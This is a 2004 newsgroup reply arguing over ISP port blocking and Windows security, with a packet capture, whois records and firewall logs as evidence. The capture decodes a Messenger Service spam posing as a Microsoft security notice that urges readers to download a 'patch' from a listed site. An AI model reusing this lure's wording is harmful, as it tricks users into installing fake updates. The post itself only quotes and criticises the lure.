Re: I am REALLY Getting Tired of Probes on 445 and 135

From: jayjwa (jayjwa_at_nowhere.org)
Date: 11/17/04


Date: Wed, 17 Nov 2004 02:44:58 -0000


On 2004-11-14, Leythos <void@nowhere.org> wrote:

>> > I think that all ISP's
>> > should force NAT on users via their DSL/Cable modems, and all of the
>> > DSL/Cable modems should block outbound 135~139/445/1433/1434. There is
>> > no valid reason to connect on those ports - that's what a VPN is for.
>>
>> I don't. Why should I have any of my Internet access restricted in any way due
>> to MS and their legions of users running their glass-jawed OS? If I'm paying
>> for Internet access, I want *full* Internet access, not just the ports that
>> are "safe" (the ones that there's no MS virus/exploit written for yet).
>>
>> Following this logic, we should then also block all 1025, 1026, 2145, 5000,
>> 5554, 6129, 9898, 12345, 17300, and 31337?
>
> because it's not YOUR internet access, it's a service provided by the
> ISP and they can change it at any time without your permission.

Sure...and *I* can then take my money and give it to an ISP that doesn't do
such nonsense.

> While you may not like it, MS machines are the most compromised on the
> net and there is little going to change about that. If you're not using

100% agreed

> a MS machine then blocking those ports (the ones I mentioned) would mean
> little, if anything, to your system. Since the ports I mentioned are not
> something that should be used "across" the internet by MS machines,
> there is little reason to expose them on networks being used by MS
> systems, in fact, it might increase everyone's performance if they were
> blocked.

There are other implementations of SMB and even NetBIOS than MS's:
http://www.samba.org/

> One last thing - nice troll on the MS OS, it's actually quite stable,
> quite securable, and quite easy to manage once you learn it, much the
> same as Linux.

Stable? Like when rebooting is the norm, required constantly (remove an app:
reboot. Upgrade something: reboot. Change a setting: reboot. Reboot: reboot.)
Rebooting systems aren't stable. Ever run more than 3 things at once, each in
its own "window"? Reminds me of task *switching*, not real multi-tasking. The
desktop becomes discolored. Apps hang. Parts of the OS simply "disappear". I'm
forced into using W32 frequently, and I've used Windows since 3.1. Little has
changed. The browser is integrated into the OS.
After cleaning an infected machine I had all but disabled MSIE; then I used
something completely unrelated to IE, and here comes IE... Pop! On flashes the
AV: Warning, DSO exploit attempt. Currently there are major vulnerabilities for
it which have no patch (read Full Disclosure). How is that secure? MS takes
months to fix even trivial bugs. If at all. How is that secure? The fact that
there are hundreds of thousands of viruses for Windows is a testament to just
how easy it is to gain control of the OS from outside. Spyware? Adware? Those
are, again, purely MS Windows problems. In fact, amazingly, you cannot
connect a brand new Windows XP system out of the box to the Internet and *not*
have it get owned. That's pretty bad. Find any Windows system on the 'Net:
they're the ones with port 1025, 1026, or 1027 open to the world, flapping in
the breeze. Tons of useless "services" enabled by default. Most users don't
know they even exist. Port 5000. Windows 'Networking'. Messenger spam:

Frame 1 (825 bytes on wire, 825 bytes captured)
    Arrival Time: Nov 16, 2004 00:46:39.779560000
    Time delta from previous packet: 0.000000000 seconds
    Time since reference or first frame: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 825 bytes
    Capture Length: 825 bytes
Linux cooked capture
    Packet type: Unicast to us (0)
    Link-layer address type: 512
    Link-layer address length: 0
    Source: <MISSING>
    Protocol: IP (0x0800)
Internet Protocol, Src Addr: 70.240.112.68 (70.240.112.68), Dst Addr: 64.179.7.203 (64.179.7.203)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 809
    Identification: 0xd9ea (55786)
    Flags: 0x00
        0... = Reserved bit: Not set
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 108
    Protocol: UDP (0x11)
    Header checksum: 0x7227 (correct)
    Source: 70.240.112.68 (70.240.112.68)
    Destination: 64.179.7.203 (64.179.7.203)
User Datagram Protocol, Src Port: 21902 (21902), Dst Port: 1026 (1026)
    Source port: 21902 (21902)
    Destination port: 1026 (1026)
    Length: 789
    Checksum: 0x0000 (none)
DCE RPC
    Version: 4
    Packet type: Request (0)
    Flags1: 0x28
        0... .... = Reserved: Not set
        .0.. .... = Broadcast: Not set
        ..1. .... = Idempotent: Set
        ...0 .... = Maybe: Not set
        .... 1... = No Fack: Set
        .... .0.. = Fragment: Not set
        .... ..0. = Last Fragment: Not set
        .... ...0 = Reserved: Not set
    Flags2: 0x00
        0... .... = Reserved: Not set
        .0.. .... = Reserved: Not set
        ..0. .... = Reserved: Not set
        ...0 .... = Reserved: Not set
        .... 0... = Reserved: Not set
        .... .0.. = Reserved: Not set
        .... ..0. = Cancel Pending: Not set
        .... ...0 = Reserved: Not set
    Data Representation: 100000
        Byte order: Little-endian (1)
        Character: ASCII (0)
        Floating-point: IEEE (0)
    Serial High: 0x00
    Object UUID: 00000000-0000-0000-0000-000000000000
    Interface: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc
    Activity: fc125ffc-5cdc-d83a-cd35-6be5d09f7312
    Server boot time: Unknown (0)
    Interface Ver: 1
    Sequence num: 0
    Opnum: 0
    Interface Hint: 0xffff
    Activity Hint: 0xffff
    Fragment len: 701
    Fragment num: 0
    Auth proto: None (0)
    Serial Low: 0x00
Microsoft Messenger Service, NetrSendMessage
    Operation: NetrSendMessage (0)
    Server
        Max Count: 10
        Offset: 0
        Actual Count: 10
        Server: UPDATENOW
    Client
        Max Count: 10
        Offset: 0
        Actual Count: 10
        Client: WINDOWS
    Message
        Max Count: 641
        Offset: 0
        Actual Count: 641
        Message: Important Notice From MSOFT\r\n\r\n
                Buffer Overflow in Messenger Service Allows Unexpected
                Computer Shutdown,\r\nVirus Infection and Remote Code
                Execution\r\n\r\nAffected Software: \r\n\r\nMicrosoft
                Windows NT Workstation \r\nMicro

0000 00 00 02 00 00 00 00 00 00 00 00 00 00 00 08 00 ................
0010 45 00 03 29 d9 ea 00 00 6c 11 72 27 46 f0 70 44 E..)....l.r'F.pD
0020 40 b3 07 cb 55 8e 04 02 03 15 00 00 04 00 28 00 @...U.........(.
0030 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 f8 91 7b 5a 00 ff d0 11 a9 b2 00 c0 ......{Z........
0050 4f b6 e6 fc fc 5f 12 fc dc 5c 3a d8 cd 35 6b e5 O...._...\:..5k.
0060 d0 9f 73 12 00 00 00 00 01 00 00 00 00 00 00 00 ..s.............
0070 00 00 ff ff ff ff bd 02 00 00 00 00 0a 00 00 00 ................
0080 00 00 00 00 0a 00 00 00 55 50 44 41 54 45 4e 4f ........UPDATENO
0090 57 00 00 00 0a 00 00 00 00 00 00 00 0a 00 00 00 W...............
00a0 57 49 4e 44 4f 57 53 00 00 00 00 00 81 02 00 00 WINDOWS.........
00b0 00 00 00 00 81 02 00 00 49 6d 70 6f 72 74 61 6e ........Importan
00c0 74 20 4e 6f 74 69 63 65 20 46 72 6f 6d 20 4d 53 t Notice From MS
00d0 4f 46 54 0d 0a 0d 0a 42 75 66 66 65 72 20 4f 76 OFT....Buffer Ov
00e0 65 72 66 6c 6f 77 20 69 6e 20 4d 65 73 73 65 6e erflow in Messen
00f0 67 65 72 20 53 65 72 76 69 63 65 20 41 6c 6c 6f ger Service Allo
0100 77 73 20 55 6e 65 78 70 65 63 74 65 64 20 43 6f ws Unexpected Co
0110 6d 70 75 74 65 72 20 53 68 75 74 64 6f 77 6e 2c mputer Shutdown,
0120 0d 0a 56 69 72 75 73 20 49 6e 66 65 63 74 69 6f ..Virus Infectio
0130 6e 20 61 6e 64 20 52 65 6d 6f 74 65 20 43 6f 64 n and Remote Cod
0140 65 20 45 78 65 63 75 74 69 6f 6e 0d 0a 0d 0a 41 e Execution....A
0150 66 66 65 63 74 65 64 20 53 6f 66 74 77 61 72 65 ffected Software
0160 3a 20 0d 0a 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 : ....Microsoft
0170 57 69 6e 64 6f 77 73 20 4e 54 20 57 6f 72 6b 73 Windows NT Works
0180 74 61 74 69 6f 6e 20 0d 0a 4d 69 63 72 6f 73 6f tation ..Microso
0190 66 74 20 57 69 6e 64 6f 77 73 20 4e 54 20 53 65 ft Windows NT Se
01a0 72 76 65 72 20 34 2e 30 20 0d 0a 4d 69 63 72 6f rver 4.0 ..Micro
01b0 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 32 30 30 soft Windows 200
01c0 30 20 20 20 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 0 ..Microsoft
01d0 57 69 6e 64 6f 77 73 20 58 50 20 20 0d 0a 4d 69 Windows XP ..Mi
01e0 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 crosoft Windows
01f0 57 69 6e 39 38 20 20 20 0d 0a 4d 69 63 72 6f 73 Win98 ..Micros
0200 6f 66 74 20 57 69 6e 64 6f 77 73 20 53 65 72 76 oft Windows Serv
0210 65 72 20 32 30 30 33 0d 0a 0d 0a 4e 6f 6e 20 41 er 2003....Non A
0220 66 66 65 63 74 65 64 20 53 6f 66 74 77 61 72 65 ffected Software
0230 3a 20 0d 0a 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 : ....Microsoft
0240 57 69 6e 64 6f 77 73 20 4d 69 6c 6c 65 6e 6e 69 Windows Millenni
0250 75 6d 20 45 64 69 74 69 6f 6e 0d 0a 0d 0a 59 6f um Edition....Yo
0260 75 72 20 73 79 73 74 65 6d 20 49 53 20 61 66 66 ur system IS aff
0270 65 63 74 65 64 2c 20 64 6f 77 6e 6c 6f 61 64 20 ected, download
0280 74 68 65 20 70 61 74 63 68 20 66 72 6f 6d 20 74 the patch from t
0290 68 65 20 61 64 64 72 65 73 73 20 62 65 6c 6f 77 he address below
02a0 20 21 20 0d 0a 46 49 52 53 54 20 54 59 50 45 20 ! ..FIRST TYPE
02b0 54 48 45 20 55 52 4c 20 42 45 4c 4f 57 20 49 4e THE URL BELOW IN
02c0 54 4f 20 59 4f 55 52 20 49 4e 54 45 52 4e 45 54 TO YOUR INTERNET
02d0 20 42 52 4f 57 53 45 52 2c 20 54 48 45 4e 20 43 BROWSER, THEN C
02e0 4c 49 43 4b 20 27 4f 4b 27 20 0d 0a 20 20 20 20 LICK 'OK' ..
02f0 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 ..
0300 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0310 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0320 20 20 20 20 20 20 20 57 57 57 2e 55 50 44 41 54 WWW.UPDAT
0330 45 4e 4f 57 2e 4f 52 47 00 ENOW.ORG.

Microsoft's *own machines* are infested with the same viruses that
plague their customers:

Ongoing for several months now, the machine at IP address 207.46.98.138
has targeted my host endlessly, attempting multiple times to connect to
TCP port 80 within one hour, every hour. According to whois listings, this
is the address of:

OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US

NetRange: 207.46.0.0 - 207.46.255.255
CIDR: 207.46.0.0/16
NetName: MICROSOFT-GLOBAL-NET
NetHandle: NET-207-46-0-0-1
Parent: NET-207-0-0-0-0
NetType: Direct Assignment
NameServer: DNS1.CP.MSFT.NET
NameServer: DNS2.CP.MSFT.NET
NameServer: DNS1.TK.MSFT.NET
NameServer: DNS1.DC.MSFT.NET
NameServer: DNS1.SJ.MSFT.NET
Comment:
RegDate: 1997-03-31
Updated: 2002-12-05

TechHandle: ZM39-ARIN
TechName: Microsoft
TechPhone: +1-425-936-4200
TechEmail: noc@microsoft.com

OrgAbuseHandle: HOTMA-ARIN
OrgAbuseName: Hotmail Abuse
OrgAbusePhone: +1-425-882-8080
OrgAbuseEmail: abuse@hotmail.com

OrgAbuseHandle: MSNAB-ARIN
OrgAbuseName: MSN ABUSE
OrgAbusePhone: +1-425-882-8080
OrgAbuseEmail: abuse@msn.com

OrgAbuseHandle: ABUSE231-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-425-882-8080
OrgAbuseEmail: abuse@microsoft.com

OrgNOCHandle: ZM23-ARIN
OrgNOCName: Microsoft Corporation
OrgNOCPhone: +1-425-882-8080
OrgNOCEmail: noc@microsoft.com

OrgTechHandle: MSFTP-ARIN
OrgTechName: MSFT-POC
OrgTechPhone: +1-425-882-8080
OrgTechEmail: iprrms@microsoft.com

# ARIN WHOIS database, last updated 2004-11-12 19:10

Several email notices of abuse have been sent to abuse@microsoft.com. There
has been no reply. At http://www.mynetwatchman.com/LID.asp?IID=116661437
one can see an incident write-up for this host, for the same issues. Here is
a typical example of log activity:

<Fri Nov 12 09:18:32 2004> 207.46.98.138:4154 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:18:35 2004> 207.46.98.138:4154 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:18:41 2004> 207.46.98.138:4154 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:30:52 2004> 207.46.98.138:1624 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:30:55 2004> 207.46.98.138:1624 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:31:01 2004> 207.46.98.138:1624 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:42:48 2004> 207.46.98.138:4239 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:42:51 2004> 207.46.98.138:4239 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:42:58 2004> 207.46.98.138:4239 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 10:03:17 2004> 207.46.98.138:3275 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 10:03:20 2004> 207.46.98.138:3275 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 10:03:26 2004> 207.46.98.138:3275 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:47:56 2004> 207.46.98.138:3979 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:47:59 2004> 207.46.98.138:3979 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:48:05 2004> 207.46.98.138:3979 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:59:04 2004> 207.46.98.138:3023 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:59:07 2004> 207.46.98.138:3023 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:59:13 2004> 207.46.98.138:3023 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:12:01 2004> 207.46.98.138:4406 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:12:04 2004> 207.46.98.138:4406 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:12:10 2004> 207.46.98.138:4406 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:23:32 2004> 207.46.98.138:4777 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:23:35 2004> 207.46.98.138:4777 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:23:41 2004> 207.46.98.138:4777 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:34:44 2004> 207.46.98.138:1467 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:34:47 2004> 207.46.98.138:1467 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:34:53 2004> 207.46.98.138:1467 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:47:16 2004> 207.46.98.138:3610 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:47:19 2004> 207.46.98.138:3610 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:47:25 2004> 207.46.98.138:3610 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:57:50 2004> 207.46.98.138:4787 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:57:53 2004> 207.46.98.138:4787 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:57:59 2004> 207.46.98.138:4787 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:08:43 2004> 207.46.98.138:1966 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:08:46 2004> 207.46.98.138:1966 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:08:52 2004> 207.46.98.138:1966 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:19:12 2004> 207.46.98.138:4653 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:19:15 2004> 207.46.98.138:4653 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:19:21 2004> 207.46.98.138:4653 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:32:44 2004> 207.46.98.138:4484 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:32:47 2004> 207.46.98.138:4484 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:32:53 2004> 207.46.98.138:4484 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:44:41 2004> 207.46.98.138:3287 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:44:44 2004> 207.46.98.138:3287 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:44:50 2004> 207.46.98.138:3287 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:07:21 2004> 207.46.98.138:4903 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:07:24 2004> 207.46.98.138:4903 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:07:30 2004> 207.46.98.138:4903 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:18:40 2004> 207.46.98.138:4479 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:18:43 2004> 207.46.98.138:4479 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:18:49 2004> 207.46.98.138:4479 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:32:06 2004> 207.46.98.138:4176 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:32:09 2004> 207.46.98.138:4176 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:32:15 2004> 207.46.98.138:4176 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:46:26 2004> 207.46.98.138:4328 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:46:29 2004> 207.46.98.138:4328 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:46:35 2004> 207.46.98.138:4328 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:57:33 2004> 207.46.98.138:4713 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:57:37 2004> 207.46.98.138:4713 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:57:43 2004> 207.46.98.138:4713 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:10:01 2004> 207.46.98.138:3596 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:10:04 2004> 207.46.98.138:3596 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:10:10 2004> 207.46.98.138:3596 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:21:49 2004> 207.46.98.138:4955 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:21:52 2004> 207.46.98.138:4955 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:21:58 2004> 207.46.98.138:4955 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:34:24 2004> 207.46.98.138:1282 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:34:27 2004> 207.46.98.138:1282 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:34:33 2004> 207.46.98.138:1282 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:45:20 2004> 207.46.98.138:4191 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:45:23 2004> 207.46.98.138:4191 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:45:30 2004> 207.46.98.138:4191 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:56:50 2004> 207.46.98.138:1175 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:56:53 2004> 207.46.98.138:1175 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:56:59 2004> 207.46.98.138:1175 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:44:43 2004> 207.46.98.138:3785 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:44:46 2004> 207.46.98.138:3785 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:44:52 2004> 207.46.98.138:3785 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:58:14 2004> 207.46.98.138:3804 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:58:17 2004> 207.46.98.138:3804 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:58:23 2004> 207.46.98.138:3804 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:09:31 2004> 207.46.98.138:3420 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:09:34 2004> 207.46.98.138:3420 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:09:40 2004> 207.46.98.138:3420 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:21:14 2004> 207.46.98.138:3732 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:21:17 2004> 207.46.98.138:3732 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:21:23 2004> 207.46.98.138:3732 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:33:35 2004> 207.46.98.138:1771 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:33:38 2004> 207.46.98.138:1771 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:33:44 2004> 207.46.98.138:1771 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:12:16 2004> 207.46.98.138:1201 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:12:19 2004> 207.46.98.138:1201 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:12:25 2004> 207.46.98.138:1201 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:23:35 2004> 207.46.98.138:3296 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:23:38 2004> 207.46.98.138:3296 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:23:44 2004> 207.46.98.138:3296 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:37:21 2004> 207.46.98.138:1363 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:37:24 2004> 207.46.98.138:1363 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:37:30 2004> 207.46.98.138:1363 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:48:47 2004> 207.46.98.138:3558 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:48:50 2004> 207.46.98.138:3558 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:48:56 2004> 207.46.98.138:3558 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:59:30 2004> 207.46.98.138:4545 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:59:33 2004> 207.46.98.138:4545 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:59:39 2004> 207.46.98.138:4545 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:18:27 2004> 207.46.98.138:4652 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:18:30 2004> 207.46.98.138:4652 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:18:36 2004> 207.46.98.138:4652 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:29:18 2004> 207.46.98.138:4190 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:29:21 2004> 207.46.98.138:4190 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
